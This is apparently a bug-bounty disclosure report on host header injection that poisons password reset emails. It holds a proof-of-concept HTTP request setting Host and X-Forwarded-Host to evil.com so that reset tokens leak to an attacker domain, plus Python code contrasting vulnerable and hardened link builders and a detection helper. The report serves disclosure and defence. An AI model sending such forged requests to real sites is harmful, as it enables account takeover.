Host Header Private Program 2025-01-01
Host Header Injection Leading to Password Reset Poisoning
Severity: High | Status: Resolved
Summary
The application built the password reset link from the request's Host header (and the X-Forwarded-Host header when present) instead of from a fixed, server-side configured domain. Sending a password reset request with a forged Host value therefore caused the reset email to contain a link pointing to an attacker-controlled domain, where the reset token would be delivered if the victim clicked it.
Proof of Concept
POST /forgot-password HTTP/1.1
Host: evil.com
X-Forwarded-Host: evil.com
Content-Type: application/x-www-form-urlencoded

email=victim@target.com
Impact
Password reset link hijacking leading to account takeover.
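The following is an added illustration, not code from the report or the vendor: a password reset link builder written the vulnerable way (origin taken from Host / X-Forwarded-Host) next to a hardened version (X-Forwarded-Host ignored, Host checked against an allow-list, link built from a configured origin), plus a small detection helper for flagging such requests in logs. The origin, allow-list and token values are constructed placeholders.

```python
from urllib.parse import urlencode

# Assumptions (constructed for this example, not the vendor's real values):
CANONICAL_ORIGIN = "https://app.example.com"
ALLOWED_HOSTS = {"app.example.com"}


def _norm(headers: dict) -> dict:
    # HTTP header names are case-insensitive; compare on a lower-cased copy.
    return {k.lower(): v for k, v in headers.items()}


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Vulnerable pattern: the link's origin comes from request headers, so
    whoever controls Host / X-Forwarded-Host controls where the token is sent."""
    h = _norm(headers)
    host = h.get("x-forwarded-host") or h.get("host")
    return f"https://{host}/reset-password?{urlencode({'token': token})}"


def hardened_reset_link(headers: dict, token: str) -> str:
    """Hardened pattern: X-Forwarded-Host is never consulted, Host must match
    the allow-list, and the link is built from a server-side configured origin."""
    h = _norm(headers)
    host = h.get("host", "").split(":")[0].strip().lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {host!r}")
    return f"{CANONICAL_ORIGIN}/reset-password?{urlencode({'token': token})}"


def suspicious_host_headers(headers: dict) -> list:
    """Detection: names of Host-type headers whose value is not an allowed host.
    Alerting on this for /forgot-password requests surfaces poisoning attempts."""
    h = _norm(headers)
    flagged = []
    for name in ("host", "x-forwarded-host"):
        if name in h and h[name].split(":")[0].strip().lower() not in ALLOWED_HOSTS:
            flagged.append(name)
    return flagged
```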
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.